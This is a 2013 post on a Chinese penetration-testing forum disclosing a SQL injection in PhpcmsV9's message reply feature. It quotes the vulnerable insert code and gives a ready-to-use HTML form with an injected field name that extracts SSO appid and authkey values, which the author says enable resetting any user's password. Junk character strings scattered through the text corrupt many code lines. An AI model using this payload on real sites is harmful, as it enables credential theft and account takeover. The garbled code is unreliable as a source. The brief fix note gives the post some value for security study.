中国网络渗透测试联盟

标题: PhpcmsV9 SQL注射修改任意用户密码漏洞 [打印本页]

---

作者: admin    时间: 2013-2-23 11:33
标题: PhpcmsV9 SQL注射修改任意用户密码漏洞
简要描述：

' b- B. T* X) r, U* B8 l/ w第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。

; [4 J6 ]% W/ y; k) N, O' Y明天再更新下一个漏洞。
详细说明：
在/phpcms9/phpcms/modules/message/index.php中有代码如下：
3 H8 O9 W& a6 ?  ]) D# v% ?1 I- u
5 _" w" A) a% X$messageid = $this->message_db->insert($_POST['info'],true);
0 J7 a1 b, o# d* n3 J
" ^; P) k* l/ L3 |) s. S; {7 l
  {3 Q8 ~* |, P* [; Einsert方法是key value的，代码如下：
0 y9 w) S) \" ^( h5 a
" B0 h) `2 J2 l5 m+ Y$ v9 I: [public function insert($data, $table, $return_insert_id = false, $replace = false) {
                if(!is_array( $data ) || $table == '' || count($data) == 0) {
' w5 h' k1 e: O6 S7 S) `                        return false;
                }
               
                $fielddata = array_keys($data);
4 p, y/ q9 a% t! i4 x8 P* m                $valuedata = array_values($data);
3 [" b- O  y" A& v/ T7 q: V5 n                array_walk($fielddata, array($this, 'add_special_char'));
3 X% q" E& `# Q  B& c                array_walk($valuedata, array($this, 'escape_string'));
               
' H# T% V$ E# z# J) c                $field = implode (',', $fielddata);
                $value = implode (',', $valuedata);
' ]: r1 F4 d" Z0 h4 S
                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
  U8 Z% U/ ]$ I  S+ _0 X: r, P, M                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
                $return = $this->execute($sql);
7 g1 z% [$ ?4 p& Y# I9 K1 L9 f                return $return_insert_id ? $this->insert_id() : $return;
        }
  I- L; m& ]( D, d7 @# }" V& t; B3 ?

+ v+ e& p; m7 e+ n5 r0 l嗯，很遗憾的是
1 L% v0 Y0 m: r  _0 Y# [
array_walk($fielddata, array($this, 'add_special_char'));


- Z0 \# O2 P$ f  M中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。

& z, i! Y0 T: P* N到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。

' p' Z. D* M+ ]3 `' y+ p漏洞证明：
读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。
[attach]200[/attach]
, I% C; k. \0 q
1 J8 a2 Q. D; ~5 z: f2 i1 B表单如下：用户名什么的得自己改一改。
# ?& {" T2 F" q: R6 A% N0 F& r! y<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
<table width="100%" cellspacing="0" class="table_form">
<tr>
<th>标 题：</th>
: J& s4 r! a' K& H9 I8 |<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
) {1 Z: J" x8 S2 s/ i4 w</tr>
2 j( d# p0 j# H1 u<tr>
<th>内 容：</th>
6 P# d, @" T! g2 T<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
8 I' I+ Q; N$ T- L. z5 a</tr>
<input type="hidden" name="info[replyid]" value="2" />
<input type="hidden" name="info[send_to_id]" value="cc" />
! @% J( W. D5 S$ C$ y. A' n<input type="hidden" name="info[send_from_id]" value="hh">
<!-- 漏洞的利用重点在这里开始 -->
8 B. R4 b" G; `$ ?<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
0 I' r. [4 @* d. F; @8 }6 g<!-- 漏洞的利用重点在这里结束 -->
5 z" \- T) q! e% }<tr>
<th>验证码：</th>
<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
</tr>
, x5 Y$ d3 k, h6 y0 w$ [4 p<tr>
0 M1 ?, v6 p/ W1 F' z<td></td>
<td colspan="2"><label>
3 n# v, I# W9 r5 ~6 J& r* `<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
$ r9 l( X: Z: A" K) {  r/ m! |1 C8 Y</label></td>
</tr>
1 S( c. O1 V' g" \% V2 C2 x& r</table>
" @+ k& o- s1 Y5 Z2 ]' H, \, C</form>
% w. n6 D% T" K( u$ S在add_special_char函数内对key做过滤就可以了。


& }- b/ \1 d- e9 K: J& S1 ~

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2